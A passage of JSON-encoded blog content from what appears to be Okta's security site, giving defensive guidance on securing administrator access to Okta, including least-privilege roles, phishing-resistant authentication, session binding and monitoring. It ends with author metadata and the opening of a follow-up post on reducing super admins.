require a single factor.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"EA in Okta Admin Console from May 2024.\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The purpose of this blog post is to zoom out and think holistically about how to use these features to:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Reduce the attack surface of your Okta org,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Prevent account takeovers, and\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Limit the blast radius of a stolen session\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Reducing the Attack Surface\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The first step to preventing unauthorized access to privileged applications is to reduce the number of accounts with privileged roles.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s standard administrative roles offer the fastest path to value for new workforce deployments. 
Over time, the most security conscious organizations migrate to Custom Admin Roles in pursuit of least privilege access.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This journey starts with:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Assigning administrative permissions by \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/users-groups-profiles/usgp-groups-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Group\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", and avoiding assigning them individually. This greatly simplifies the administration and governance of policies.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Identifying tactical ways to minimize the number of accounts with \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/security/administrators-admin-comparison.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"highly privileged roles\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (Super Administrators, Org Administrators, App Administrators). 
\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/automation-hooks/delegated-flows/about-delegated-flows.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Delegated Flows\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", for example, offers opportunities to reduce the number of Workflows users that require administrative access.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Breaking down common administrative functions (such as assigning users to apps, or factor lifecycle operations) into \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/custom-admin-role/custom-admin-roles.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Custom Admin Roles\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", and assigning them to specific resources (groups, apps, workflows etc), to further promote least privilege.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The target state is to move as close as possible to “zero standing privileges”.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Zero standing privileges is a model in which an administrator gets access to the resources and permissions they require on a just-in-time basis to complete a specified task, after which time the access is automatically revoked.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/products/privileged-access/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Privileged 
Access Management (OPA)\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" uses this principle to secure access to servers, databases, apps and other targets. When OPA is combined with the Access Requests feature in \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/products/identity-governance/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Identity Governance\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (OIG), organizations can be confident that all access to privileged resources is authorized, ephemeral (temporary), and recorded for easy auditing.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"However, we want zero standing privileges to be a design pattern in reach for even the smallest of Okta’s customers. Okta is committed to ensuring that every workforce customer can achieve zero standing permissions for access to the functions they require to administer Okta.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s product team has subsequently lifted a subset of premium Okta Privileged Access and Identity Governance features and built them directly into the Okta Admin Console to make this essential protection available to all Okta Workforce customers at no cost.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Using this configuration, the journey to zero standing privileges in Okta is simpler again:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"ordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Assign all administrators with custom roles designed for the minimum resources and permissions required to complete day-to-day 
work;\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Create a Request Approval process for administrators that require temporary (“just-in-time”) elevated permissions for administrative tasks that are performed less often,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Require dual authorization (approvals) from two or more fellow administrators for access to roles with elevated permissions.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Create an action in the Access Request that adds a user to a group assigned the elevated permissions after authorization and removes them from the group after the specified time period expires.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The only exceptions you might need to make to this process are:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"ordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A break-glass account with a super administrator role.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Depending on your deployment, you may require an account for emergency access. This “break glass account” needs to be protected by policies that assume your trusted network or PAM solution is not available. We suggest limiting access by network location (using secondary or tertiary IP ranges for redundancy), and also requiring multi factor authentication. 
A common approach is to require one of several physical FIDO2 security keys enrolled for the account, plus a machine-generated string as a password. Keep the keys and the password in separate, physically secured locations, keep the account out of day-to-day use, and test the break-glass procedure periodically so that it works when it is actually needed. Access to this account should be monitored with absolute vigilance: any use should set off alarm bells in the SOC.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Service accounts used in machine-to-machine authentication\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Don’t neglect accounts used for non-human (machine-to-machine) access. Use OAuth 2.0-based \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/blog/2023/04/24/api-integrations\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"API Service Applications\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", wherever available, with the least required account permissions and scopes applied. If you are using legacy static API tokens for any integrations, make use of Okta’s \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/api.htm#editallowednetworkzones\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"IP allowlisting feature\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\": this ensures that Okta APIs will only accept requests using these tokens from trusted locations. Vault all static API tokens, maintain an inventory of their purpose, and audit and rotate regularly. Once configured, service accounts should be members of an Okta Group, and a global session policy should be applied to that group that denies interactive access (NB: this only blocks interactive sign-in and won’t restrict API access, so the token hygiene and IP allowlisting above remain the controls that bound what the account can do programmatically). Maintenance tasks should require a formal access request process that temporarily subjects the account to a different policy. 
Service accounts should otherwise be closely monitored for detection of unauthorized interactive and/or shared access.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Preventing Account Takeovers\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As discussed, Okta has built best-in-class features to prevent unauthorized access to the Okta Admin Console. Many of these features are enabled by default.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The resilience of your environment largely depends on sound configuration of policies and supporting controls. At minimum, Okta Security recommends protecting administrative users by configuring the following:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enable \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/threat-insight/ti-index.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"ThreatInsight\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in log and enforce mode. 
This will detect and prevent high-volume credential based attacks on any account that still requires a password.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Apply strong authentication policies to groups with administrative permissions.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Require administrative users to sign-in using passwordless, phishing resistant authenticators (Okta FastPass, FIDO2 WebAuthn, Smart Cards).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enforce \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/authenticators/phishing-resistant-auth.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"phishing resistance\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in policy.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Require users to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/policies/add-app-sign-on-policy-rule.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"verify their identity\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" via a biometric challenge (preferred) or PIN.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Deny the use of 
\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2022/09/okta-passkey-management-a-new-feature-flag/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"synced (cloud-backed) FIDO2 credentials\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (Passkeys) for access to the administrative console and require device-bound FIDO2 credentials instead. A synced passkey is replicated to every device signed in to the same cloud account, so it may otherwise be exposed through an unmanaged device or a compromised cloud service account; a device-bound credential cannot leave the authenticator it was created on.\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Require \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/devices/devices-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"trusted, managed devices\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for administrative access.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Require managed browsers for administrative access, since browser profile sync can carry saved passwords and extensions between the managed device and a personal account (i.e. 
do not allow administrators to sign-in to personal accounts from the browser).\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Use \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/devices/edr-integration-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"endpoint security integrations\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to deny access to devices exhibiting poor posture.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Deny all requests to administrative apps from anonymizing proxies and other untrusted networks using \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/network/create-dynamic-zone.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Dynamic Network Zones\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Evaluate \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/oie-risk-behavior-eval.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"user behavior and risk\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in policy, and alert on anomalous authentication requests (such as new device + new IP).\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Apply an explicit, catch-all deny 
rule for any access to the Okta Admin Console that doesn’t meet the above conditions.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Reducing the Blast Radius of a Stolen Session\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Irrespective of the strength of your protective controls, your threat model must also account for the theft and replay of an administrator’s session token using malware or other means.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s revised default session duration for the Admin Console is designed to limit the opportunities for adversaries to exploit a stolen session token.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"ASN Session Binding, which is enabled for all Okta orgs by default, limits the ability to replay a stolen session from a different network (ASN) than the one it was established on. IP Session Binding is stricter: it binds all requests during an administrative session to the same IP used during authentication, so an administrator whose egress IP changes mid-session (for example on a mobile network or a VPN with rotating exit addresses) will be denied and must re-authenticate. IP Session Binding is on by default for all new Okta orgs; security teams of existing orgs can optionally enforce it for the Okta Admin Console. Note that neither form of binding helps when a token is replayed from the victim’s own device or network (the malware case above), so treat them as a complement to short session durations and step-up authentication rather than a substitute.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We also recommend the following:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enable Protected Actions in the Okta Admin Console. 
This forces step-up authentication before an administrative user can modify critical settings, such as enabling a third-party Identity Provider or resetting all factors of an administrative user, greatly reducing what actions an adversary can perform with a stolen session token.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Configure a Re-authentication Frequency of “Every Sign-In Attempt” for all administrative applications. A stolen Okta session then cannot be used to open those applications without a fresh authentication, which confines the attacker to whatever is reachable without re-authenticating.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Choose FastPass as your primary authenticator. FastPass provides a fast, consistent user experience on all OS/browser platforms, prevents and detects real-time adversary-in-the-middle (AiTM) phishing campaigns, and offers an ability to constrain credentials to approved devices. It can also play a role in mitigating the theft of session tokens: FastPass can be configured to evaluate device signals on managed and unmanaged devices prior to allowing access. Okta can subsequently use these device signals to assess device context every time a user requests a new application during a session, and require re-authentication if device context is assessed to have changed.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Finally, it’s important to audit the use of administrative roles and to monitor for suspicious administrative activity. 
As we’ve said in \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/leastprivilege\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"previous posts\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", the monitoring and oversight of actions performed by users with administrative roles is a cornerstone of any well-designed security program.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We recommend the use of \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/reports/log-streaming/about-log-streams.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Log Streaming\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for the fastest access to Okta System Log events in the SIEM of your choice. You can find a sample of common detections we have published in collaboration with \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/shareddetections\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Splunk\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/08/telling-more-okta-detection-stories-google-chronicle\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Google Chronicle\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A new event relevant to organizations that have deployed ASN and IP Session binding is provided 
below.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Event\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"System Log Query\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"User Denied Access due to ASN/IP Session Binding (\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1539/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"T1539\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\")\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"eventType eq \\\"security.session.detect_client_roaming\\\"\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s engineering teams have worked tirelessly over the last 90 days to provide the guardrails and additional features required to protect access to administrative functions in Okta.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Over 9000 Okta orgs adopted ASN Session Binding within three months of its release, giving us the confidence to turn the feature on for all Workforce 
customers by default. Over 95% of Workforce orgs have maintained the default maximum and idle session duration configuration we switched on for all customers in January.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We remain committed to prioritizing the features that protect privileged users under the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/secure-identity-commitment/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Secure Identity Commitment\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2025-02-10T00:11:42.720Z","secAuthor":[{"id":"e0099522-136e-5003-b6a5-f4499896bf19","bio":{"bio":"<p>Brett Winterford is Vice President of Okta Threat Intelligence. Okta Threat Intelligence delivers timely, highly relevant and actionable insights about the threat environment, with a focus on identity-based threats. Brett was previously the regional Chief Security Officer for Okta in the Asia Pacific and Japan, and advised business and technology leaders in the region on all things identity. <br /> Prior to Okta, Brett held a senior security leadership role at Symantec, and helmed security research, awareness and education at Commonwealth Bank. 
Brett is also an award-winning journalist, editor-in-chief of iTnews Australia and a contributor to the Risky Business podcast and newsletter, to ZDNet, the Australian Financial Review and the Sydney Morning Herald.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5cVIStynit3itWxHA4pv8S/8e8e647b20b34abcaff72ee837cb797c/Brett_20Resized.jpg"},"name":"Brett Winterford","jobTitle":"VP, Okta Threat Intelligence","slug":"brett-winterford","node_locale":"en"}]},{"slug":"/seven-fewer-super-admins","id":"edf6a374-6b04-532b-8587-d8bfaf6bf15f","title":"Seven Ways to Reduce Super Admins in Okta","date":"2024-09-02T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Over the past few months, Okta has made considerable progress in our quest to deliver zero standing privileges to  administrators of the Okta Platform.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As we discussed in \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/caseforzerostandingprivileges\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Part 1 of this blog series\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", Zero Standing Privileges takes the concept of “least privilege” access to the nth degree. We aim to deliver an operating model in which no interactive (human) user account has ongoing, permanent access to highly privileged administrative roles or permissions, which are instead granted on a just-in-time, time-bound basis when required. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This model of access dramatically reduces the attack surface for an organization. In the rare circumstance that an attacker gains unauthorized access to a user or service account, their ability to abuse this access is greatly diminished.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Today, the permissions in many administrative accounts tend to exist by inertia: a role was required for a given task at some point in time, but there has been no driver (or governance) in place to pare the permissions back to what the account requires on an ongoing basis. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As we’ve \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/protectingadminsessions\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"previously written\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", the first step toward zero standing privileges is to identify the use cases your organization has for highly privileged roles. Some use cases, such as break glass accounts, require standing privileges. In other cases, a user performs an administrative task so frequently that it’s impractical to ask them to request permission every time they do it. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"However, if a permission is (a) attractive to an attacker and (b) rarely required and used intermittently, that is an ideal candidate for a custom admin role that is only available on a Just-in-Time (JIT), time-bound basis via Okta’s ability to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/security/governance-admin-roles/govern-admin-roles.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"govern Okta admin roles\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". (NB: The ability to govern Okta admin roles is a new capability, available to all Okta Workforce customers: talk to your Account Exec if you can’t find it in the console!)\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As a first step, Okta created \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/security/custom-admin-role/about-role-permissions.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"specific 